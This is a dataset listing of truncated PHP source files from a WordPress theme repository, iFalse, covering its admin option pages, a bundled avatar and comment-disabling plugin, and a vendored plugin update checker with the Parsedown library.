kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/i_opt.php | admin/i_opt.php | <?php
error_reporting(0);
if($_POST["i_opt"]){
$attachment_id = media_handle_upload( 'logo', 0 ); //上传图片,返回的是 附件的ID
$logo_url = wp_get_attachment_url($attachment_id); //获取 图片的地址
if($logo_url){
update_option("logo_img",$logo_url); //如果图片地址在在,就将图片的地址写入到数据库
}
}
$logo_img = get_option("logo_img");
?... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/uninstall.php | admin/avatar/uninstall.php | <?php
if (!defined('WP_UNINSTALL_PLUGIN')) {
exit();
}
$options = array(
'wpupa_tinymce',
'wpupa_show_avatars',
'wpupa_rating',
'wpupa_default',
'wpupa_version',
'wpupa_allow_upload',
'wpupa_disable_gravatar',
'wpupa_show_avatars',
'wpupa_attachment_id',
);
foreach ($options a... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/wp-user-profile-avatar.php | admin/avatar/wp-user-profile-avatar.php | <?php
/**
Plugin Name: WP User Profile Avatar
Plugin URI: https://www.wp-eventmanager.com/
Description: WP User Profile Avatar
Author: WP Event Manager
Author URI: https://www.wp-eventmanager.com
Text Domain: wp-user-profile-avatar
Domain Path: /languages
Version: 1.0
Since: 1.0
Requires WordPress ... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/disable-comments.php | admin/avatar/disable-comments.php | <?php
add_action('admin_menu', 'comments_settings_menu');
add_action('admin_menu', 'comments_tools_menu');
function comments_settings_menu() {
add_submenu_page('options-general.php', 'Disable Comments', 'Disable Comments', 'manage_options', 'disable_comments_settings', 'comments_settings_page');
}
function comme... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/wp-user-profile-avatar-functions.php | admin/avatar/wp-user-profile-avatar-functions.php | <?php
if (!function_exists('get_wpupa_rating')) {
/**
* get_wpupa_rating function.
*
* @access public
* @param
* @return array
* @since 1.0
*/
function get_wpupa_rating() {
return apply_filters('wp_user_avatar_rating', array(
'G' => __('G — 适合任何年龄的... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/admin/wp-user-profile-avatar-settings.php | admin/avatar/admin/wp-user-profile-avatar-settings.php | <?php
// Exit if accessed directly
if (!defined('ABSPATH')) {
exit;
}
/**
* WPUPA_Settings class.
*/
class WPUPA_Settings {
/**
* Constructor - get the plugin hooked in and ready
*/
public function __construct() {
add_action('wp_loaded', array($this, 'edit_handler'));
}
/**
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/admin/wp-user-profile-avatar-admin.php | admin/avatar/admin/wp-user-profile-avatar-admin.php | <?php
// Exit if accessed directly
if (!defined('ABSPATH')) {
exit;
}
/**
* WPUPA_Admin class.
*/
class WPUPA_Admin {
/**
* Constructor - get the plugin hooked in and ready
*/
public function __construct() {
include_once( 'wp-user-profile-avatar-settings.php' );
$this->settings... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/admin/templates/shortcode-popup.php | admin/avatar/admin/templates/shortcode-popup.php | <div class="wrap wp-user-profile-avatar-shortcode-wrap">
<h2 class="nav-tab-wrapper">
<a href="#settings_user_avatar" class="nav-tab"><?php _e('User Avatar', 'wp-user-profile-avatar'); ?></a>
<a href="#settings_upload_avatar" class="nav-tab"><?php _e('Upload Avatar', 'wp-user-profile-avatar'); ?></a... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/shortcodes/wp-user-profile-avatar-shortcodes.php | admin/avatar/shortcodes/wp-user-profile-avatar-shortcodes.php | <?php
class WPUPA_Shortcodes {
/**
* Constructor - get the plugin hooked in and ready
*/
public function __construct() {
add_shortcode('user_profile_avatar', array($this, 'user_profile_avatar'));
add_shortcode('user_profile_avatar_upload', array($this, 'user_profile_avatar_upload'));... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/shortcodes/wp-author-social-info-shortcodes.php | admin/avatar/shortcodes/wp-author-social-info-shortcodes.php | <?php
/*
* Class to define author box social info by using shortcode
*/
class WPUPA_authorbox_socialinfo_Shortcodes {
/**
* Constructor
*/
public function __construct() {
add_shortcode('authorbox_social_link', array($this, 'authorbox_social_link'));
}
/**
* authorbox_social... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/shortcodes/wp-user-display.php | admin/avatar/shortcodes/wp-user-display.php | <?php
/*
* Class to define user details by using shortcode
*/
class WPUPA_User_Shortcodes {
/**
* Constructor
*/
public function __construct() {
add_shortcode('user_display', array($this, 'user_display'));
}
/**
* user_display function
*
* @access public
* @... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/includes/wp-user-profile-avatar-install.php | admin/avatar/includes/wp-user-profile-avatar-install.php | <?php
// Exit if accessed directly
if (!defined('ABSPATH')) {
exit;
}
/**
* WPUPA_Install class.
*/
class WPUPA_Install {
/**
* install function.
*
* @access public static
* @param
* @return
* @since 1.0
*/
public static function install() {
update_option('... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/includes/wp-user-profile-avatar-user.php | admin/avatar/includes/wp-user-profile-avatar-user.php | <?php
// Exit if accessed directly
if (!defined('ABSPATH')) {
exit;
}
/**
* WPUPA_User class.
*/
class WPUPA_User {
/**
* Constructor - get the plugin hooked in and ready
*/
public function __construct() {
add_filter('get_avatar_url', array($this, 'get_user_avatar_url'), 10, 3);
}... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-user-avatar.php | admin/avatar/templates/wp-user-avatar.php | <?php
/**
* user profile shortcode
*/
if (!defined('ABSPATH'))
exit;
?>
<div class="wp-user-profile-avatar">
<a href="<?php echo $link; ?>" target="<?php echo $target; ?>" class="wp-user-profile-avatar-link">
<img src="<?php echo $image_url; ?>" class="size-<?php echo $size; ?> <?php echo $align; ?>"... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/comments-settings-page.php | admin/avatar/templates/comments-settings-page.php | <?php
/**
* Setting page.
*/
if (!defined('ABSPATH')) {
exit;
}
function update_options($options) {
update_option('disable_comments_options', $options);
}
$typeargs = array('public' => true);
$options = get_option('disable_comments_options', array());
$modified_types = array();
$disabled_post_types = get_d... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-avatar-social profile-picture.php | admin/avatar/templates/wp-avatar-social profile-picture.php | <?php
/**
* Author Social Profile Picture page.
*
* @package Author Social Profile Picture page.
*/
if (!defined('ABSPATH')) {
exit;
}
?>
<?php
function wp_avatar_social_profile_picture() {
global $pagenow;
if ('profile.php' == $pagenow || 'user-edit.php' == $pagenow)
wp_register_script('wp-av... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-avatar-upload.php | admin/avatar/templates/wp-avatar-upload.php | <?php
/**
* upload user profile shortcode
*/
if (!defined('ABSPATH'))
exit;
?>
<div class="wp-user-profile-avatar-upload">
<form method="post" name="update-user-profile-avatar" class="update-user-profile-avatar" enctype="multipart/form-data">
<table class="form-table">
<tr>
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-user-list.php | admin/avatar/templates/wp-user-list.php | <?php
/**
* Wp User List Page & Username Update Page.
*/
if (!defined('ABSPATH')) {
exit;
}
use \WpUserNameChange\WpUserNameChange;
function Wp_username_edit() {
?>
<div class="wrap userupdater">
<p><h1><?php _e('用户列表', 'WP_Username_change') ?></h1></p>
<?php
$wpuser = new WpUserNameChan... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/comments-tools-page.php | admin/avatar/templates/comments-tools-page.php | <?php
/**
* Tools page.
*
* @package Disable_Comments
*/
if (!defined('ABSPATH')) {
exit;
}
?>
<div class="wrap">
<h1><?php _e('Delete Comments', 'disable-comments'); ?></h1>
<?php
global $wpdb;
$comments_count = $wpdb->get_var("SELECT count(comment_id) from $wpdb->comments");
if ($comments_... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/comments-template.php | admin/avatar/templates/comments-template.php | <?php
/**
* Dummy comments template file.
* This replaces the theme's comment template when comments are disabled everywhere
*
* @package Disable_Comments
*/
| php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-display-user.php | admin/avatar/templates/wp-display-user.php | <?php
/**
* User display shortcode
*/
if (!defined('ABSPATH'))
exit;
?>
<div class="author-details">
<p class="caption-text"><?php echo $details['first_name']; ?></p>
<p class="caption-text"><?php echo $details['last_name']; ?></p>
<p class="caption-text"><?php echo $details['description']; ?></p>
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-author-box-social-info.php | admin/avatar/templates/wp-author-box-social-info.php | <?php
/**
* Author Box Social link page.
*
* @package Author Box Social link page.
*/
if (!defined('ABSPATH')) {
exit;
}
?>
<?php
function add_user_social_contact_info($user_contact) {
$user_contact['facebook'] = __('Facebook URL');
$user_contact['skype'] = __('Skype');
$user_contact['twitter'] = ... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-username-change.php | admin/avatar/templates/wp-username-change.php | <?php
/**
* user name change function Page
*/
namespace WpUserNameChange;
if (!defined('ABSPATH')) {
exit;
}
Class WpUserNameChange {
public function __construct() {
global $wpdb;
$this->db = $wpdb;
add_action('admin_menu', array($this, 'Wp_user_list'));
add_action('init',... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-author-box-display.php | admin/avatar/templates/wp-author-box-display.php | <?php
/**
* authorbox social info display shortcode
*/
if (!defined('ABSPATH'))
exit;
?>
<!-- Get author detail-->
<div class="author_bio_section">
<div class="author_details">
<div class="author_image"><?php echo get_avatar(get_the_author_meta('ID'), 90); ?></div>
<div class="author_info"... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/avatar/templates/wp-add-new-avatar.php | admin/avatar/templates/wp-add-new-avatar.php | <?php
/**
* Add New Default Avatar page.
*
* @package Add New Default Avatar page.
*/
if (!defined('ABSPATH')) {
exit;
}
?>
<?php
$Add_New_User = new Add_New_User( );
class Add_New_User {
function admin_init() {
register_setting('discussion', 'Add_New_User', array($this, 'validate'));
a... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_nav.php | admin/options/i_nav.php | <?php
@$i_logo_url_light = stripslashes($_POST["i_logo_url_light"]);
@$i_logo_url_night = stripslashes($_POST["i_logo_url_night"]);
@$i_logo_hidden = stripslashes($_POST["i_logo_hidden"]);
@$i_header_hidden = stripslashes($_POST["i_header_hidden"]);
@$i_login_hidden = stripslashes($_POST["i_login_hidden"]);
@$i_hello =... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_footer.php | admin/options/i_footer.php | <?php
@$i_copyright = stripslashes($_POST["i_copyright"]);
@$i_icp = stripslashes($_POST["i_icp"]);
@$i_icp_gov = stripslashes($_POST["i_icp_gov"]);
@$i_upyun = stripslashes($_POST["i_upyun"]);
@$i_build_date = stripslashes($_POST["i_build_date"]);
if(@stripslashes($_POST["i_opt"])){
update_option("i_copyright", $... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_post.php | admin/options/i_post.php | <?php
@$i_random_pic = stripslashes($_POST["i_random_pic"]);
@$i_post_sidebar = stripslashes($_POST["i_post_sidebar"]);
@$i_post_copyright = stripslashes($_POST["i_post_copyright"]);
@$i_post_copyright_text = stripslashes($_POST["i_post_copyright_text"]);
@$i_next_post = stripslashes($_POST["i_next_post"]);
@$i_comment... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_other.php | admin/options/i_other.php | <?php
@$i_keywords = stripslashes($_POST["i_keywords"]);
@$i_night = stripslashes($_POST["i_night"]);
@$i_say_img = stripslashes($_POST["i_say_img"]);
@$i_cdn = stripslashes($_POST["i_cdn"]);
@$i_cdn_custom = stripslashes($_POST["i_cdn_custom"]);
@$i_404_tip = stripslashes($_POST["i_404_tip"]);
@$i_mourn = stripslashes... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_base.php | admin/options/i_base.php | <?php
@$i_plane = stripslashes($_POST["i_plane"]);
@$i_color = stripslashes($_POST["i_color"]);
@$i_color_sub = stripslashes($_POST["i_color_sub"]);
@$i_blog_to_column = stripslashes($_POST["i_blog_to_column"]);
@$i_blog_auto_column = stripslashes($_POST["i_blog_auto_column"]);
@$i_loading_pic = stripslashes($_POST["i_... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_custom.php | admin/options/i_custom.php | <?php
@$i_custom_css_head = stripslashes($_POST["i_custom_css_head"]);
@$i_custom_js_footer = stripslashes($_POST["i_custom_js_footer"]);
@$i_custom_html_head = stripslashes($_POST["i_custom_html_head"]);
@$i_custom_html_footer = stripslashes($_POST["i_custom_html_footer"]);
@$i_custom_html_tongji = stripslashes($_POST... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/options/i_home.php | admin/options/i_home.php | <?php
@$i_swiper = stripslashes($_POST["i_swiper"]);
@$i_swiper_effect = stripslashes($_POST["i_swiper_effect"]);
@$i_recommend = stripslashes($_POST["i_recommend"]);
@$i_wrapper_text = stripslashes($_POST["i_wrapper_text"]);
@$i_wrapper_name = stripslashes($_POST["i_wrapper_name"]);
@$i_notice = stripslashes($_POST["i... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/external/external-media-without-import.php | admin/external/external-media-without-import.php | <?php
/*
Plugin Name: External Media without Import
Description: Add external images to the media library without importing, i.e. uploading them to your WordPress site.
Version: 1.1.2
Author: Zhixiang Zhu
Author URI: http://zxtechart.com
License: GPLv3
License URI: https://www.gnu.org/licenses/gpl-3.0-standalone.html
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/update-checker.php | admin/update/update-checker.php | <?php
/**
* Plugin Update Checker Library 4.11
* http://w-shadow.com/
*
* Copyright 2021 Janis Elsts
* Released under the MIT license. See license.txt for details.
*/
require dirname(__FILE__) . '/load-v4p11.php'; | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/load-v4p11.php | admin/update/load-v4p11.php | <?php
require dirname(__FILE__) . '/Puc/v4p11/Autoloader.php';
new Puc_v4p11_Autoloader();
require dirname(__FILE__) . '/Puc/v4p11/Factory.php';
require dirname(__FILE__) . '/Puc/v4/Factory.php';
//Register classes defined in this version with the factory.
foreach (
array(
'Plugin_UpdateChecker' => 'Puc_v4p11_Plug... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/vendor/Parsedown.php | admin/update/vendor/Parsedown.php | <?php
if ( !class_exists('Parsedown', false) ) {
//Load the Parsedown version that's compatible with the current PHP version.
if ( version_compare(PHP_VERSION, '5.3.0', '>=') ) {
require __DIR__ . '/ParsedownModern.php';
} else {
require __DIR__ . '/ParsedownLegacy.php';
}
}
| php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/vendor/PucReadmeParser.php | admin/update/vendor/PucReadmeParser.php | <?php
if ( !class_exists('PucReadmeParser', false) ):
/**
* This is a slightly modified version of github.com/markjaquith/WordPress-Plugin-Readme-Parser
* It uses Parsedown instead of the "Markdown Extra" parser.
*/
class PucReadmeParser {
function __construct() {
// This space intentionally blank
}
functi... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/vendor/ParsedownModern.php | admin/update/vendor/ParsedownModern.php | <?php
#
#
# Parsedown
# http://parsedown.org
#
# (c) Emanuil Rusev
# http://erusev.com
#
# For the full license information, view the LICENSE file that was distributed
# with this source code.
#
#
class Parsedown
{
# ~
const version = '1.6.0';
# ~
function text($text)
{
# make sure no d... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | true |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/vendor/ParsedownLegacy.php | admin/update/vendor/ParsedownLegacy.php | <?php
#
#
# Parsedown
# http://parsedown.org
#
# (c) Emanuil Rusev
# http://erusev.com
#
# For the full license information, view the LICENSE file that was distributed
# with this source code.
#
#
class Parsedown
{
# ~
const version = '1.5.0';
# ~
function text($text)
{
# make sure no d... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | true |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/Puc/v4/Factory.php | admin/update/Puc/v4/Factory.php | <?php
if ( !class_exists('Puc_v4_Factory', false) ):
class Puc_v4_Factory extends Puc_v4p11_Factory { }
endif;
| php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/Puc/v4p11/Metadata.php | admin/update/Puc/v4p11/Metadata.php | <?php
if ( !class_exists('Puc_v4p11_Metadata', false) ):
/**
* A base container for holding information about updates and plugin metadata.
*
* @author Janis Elsts
* @copyright 2016
* @access public
*/
abstract class Puc_v4p11_Metadata {
/**
* Create an instance of this class from a JSON document.
... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/Puc/v4p11/UpgraderStatus.php | admin/update/Puc/v4p11/UpgraderStatus.php | <?php
if ( !class_exists('Puc_v4p11_UpgraderStatus', false) ):
/**
* A utility class that helps figure out which plugin or theme WordPress is upgrading.
*
* It may seem strange to have a separate class just for that, but the task is surprisingly complicated.
* Core classes like Plugin_Upgrader don't expose th... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/Puc/v4p11/OAuthSignature.php | admin/update/Puc/v4p11/OAuthSignature.php | <?php
if ( !class_exists('Puc_v4p11_OAuthSignature', false) ):
/**
* A basic signature generator for zero-legged OAuth 1.0.
*/
class Puc_v4p11_OAuthSignature {
private $consumerKey = '';
private $consumerSecret = '';
public function __construct($consumerKey, $consumerSecret) {
$this->consumerKey = $co... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
kannafay/iFalse | https://github.com/kannafay/iFalse/blob/e434c2131c7faf29aa79a2553cca35e55d56dcca/admin/update/Puc/v4p11/InstalledPackage.php | admin/update/Puc/v4p11/InstalledPackage.php | <?php
if ( !class_exists('Puc_v4p11_InstalledPackage', false) ):
/**
* This class represents a currently installed plugin or theme.
*
* Not to be confused with the "package" field in WP update API responses that contains
* the download URL of a the new version.
*/
abstract class Puc_v4p11_InstalledPackage ... | php | MIT | e434c2131c7faf29aa79a2553cca35e55d56dcca | 2026-01-05T05:14:50.586486Z | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.